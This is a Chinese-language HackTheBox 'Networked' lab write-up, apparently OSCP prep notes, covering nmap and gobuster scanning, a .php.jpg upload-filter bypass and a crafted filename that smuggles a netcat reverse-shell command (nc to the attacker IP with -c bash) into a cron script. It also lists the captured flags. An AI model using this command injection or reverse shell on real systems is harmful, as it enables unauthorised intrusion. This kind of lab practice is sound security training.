OSCP备考_0x15_HackThBox靶机_Linux_networked

Ethan医生2个月前 (06-30)靶场87

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)

nmap -sU --top-ports 100 10.129.204.201 (扫描UDP)

gobuster dir -u http://10.129.204.201/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

在backup里面有一个tar文件里面放着所有源代码,这边直接阅读代码后发现,只需要在.php后缀上添加.jpg即可以绕过

可以到home底下去查看有哪些用户和脚本使用

发现

发现有判断文件后删除的执行exec地方

/var/www/html/uploads底下创建

touch "; nc 10.10.16.31 1338 -c bash"

直接写入后三分钟后反弹SHELL

94d87600607d374fefe915de49df8507

8d3a2f3f49b5d5b243269c5e1e87aa9b

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)http://10.129.92.20:5080/dashbo...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP) &n...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

EthanDoctor